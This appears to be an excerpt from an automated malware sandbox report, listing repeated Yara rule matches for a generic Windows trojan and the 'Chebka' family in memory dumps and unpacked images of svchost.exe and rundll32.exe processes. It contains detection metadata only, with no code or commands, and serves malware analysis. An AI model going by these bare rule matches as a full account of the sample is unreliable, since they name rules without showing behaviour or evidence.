      Source: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000023.00000003.398762048.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000025.00000003.421573587.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000022.00000003.393309641.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000015.00000003.314976942.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000029.00000003.441340256.000002B668080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000B.00000003.287397377.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000019.00000003.330553966.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001A.00000003.335868543.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000016.00000003.320275239.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001E.00000003.367749828.0000021BD8400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000014.00000003.311158753.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000024.00000003.404982309.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000000D.00000002.805873048.000001A7482D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001B.00000003.347285941.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
      Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
      Source: Yara matchFile source: 37.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 37.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 41.0.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 24.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 41.2.svchost.exe.2b6680f0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 34.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 27.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 24.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 30.0.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 30.2.svchost.exe.21bd8470000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 15.2.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 36.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.rundll32.exe.4250000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 36.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.svchost.exe.1a748340000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 34.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 31.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.svchost.exe.1a748340000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 27.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 31.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 27.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 41.2.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 24.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 24.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 30.0.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 34.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 15.0.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 30.2.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 15.0.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 31.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 36.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 37.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 36.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 31.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 34.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 15.2.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 37.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 27.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 41.0.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000001F.00000003.372989113.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.356780301.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.447857921.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000003.295812726.000001B37C4F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000003.326062202.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.380766591.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.398762048.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000025.00000003.421573587.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000022.00000003.393309641.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.314976942.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000029.00000003.441340256.000002B668080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000003.287397377.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.330553966.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.335868543.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000003.320275239.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001E.00000003.367749828.0000021BD8400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000003.311158753.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000024.00000003.404982309.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.805873048.000001A7482D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000003.347285941.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4528, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4776, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5192, type: MEMORYSTR
